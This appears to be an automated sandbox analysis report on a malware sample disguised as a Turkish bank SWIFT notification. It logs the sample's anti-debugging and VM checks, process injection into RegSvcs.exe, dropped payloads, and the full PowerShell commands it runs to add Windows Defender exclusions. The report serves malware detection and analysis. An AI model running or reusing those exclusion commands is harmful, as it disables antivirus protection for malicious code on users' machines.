Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

API coverage: 5.8 %

Source: C:\Windows\System32\alg.exe TID: 1624	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 2348	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7192	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7284	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Local\differences\niellist.exe TID: 7792	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 6573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364	Thread sleep count: 3193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1084	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 5784	Thread sleep count: 56 > 30

Source: C:\Windows\System32\alg.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\build.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: XClient.exe, 0000000B.00000002.2554544345.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: niellist.exe, 00000011.00000002.1410876293.0000000000A67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH_
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772258009.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987104410.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1279607006.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1301817697.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node			graph_0-109129
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	API call chain: ExitProcess graph end node			graph_0-109451

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_005A8594 mov eax, dword ptr fs:[00000030h]	0_2_005A8594
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD1130 mov eax, dword ptr fs:[00000030h]	0_2_00AD1130
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B13F3D mov eax, dword ptr fs:[00000030h]	0_2_00B13F3D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D711F0 mov eax, dword ptr fs:[00000030h]	0_2_00D711F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71250 mov eax, dword ptr fs:[00000030h]	0_2_00D71250
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D6FB80 mov eax, dword ptr fs:[00000030h]	0_2_00D6FB80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA1130 mov eax, dword ptr fs:[00000030h]	3_2_00AA1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE3F3D mov eax, dword ptr fs:[00000030h]	3_2_00AE3F3D
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA2A0 mov eax, dword ptr fs:[00000030h]	3_2_00CEA2A0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA300 mov eax, dword ptr fs:[00000030h]	3_2_00CEA300
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CE8C30 mov eax, dword ptr fs:[00000030h]	3_2_00CE8C30
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFAE88 mov eax, dword ptr fs:[00000030h]	17_2_00AFAE88
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC4F8 mov eax, dword ptr fs:[00000030h]	17_2_00AFC4F8
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_00AFC558 mov eax, dword ptr fs:[00000030h]	17_2_00AFC558
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_033C1130 mov eax, dword ptr fs:[00000030h]	17_2_033C1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03403F3D mov eax, dword ptr fs:[00000030h]	17_2_03403F3D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B11361
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B14C7B
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00AE1361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00AE4C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03401361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_03401361
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 17_2_03404C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_03404C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 941008			Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FC6008

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
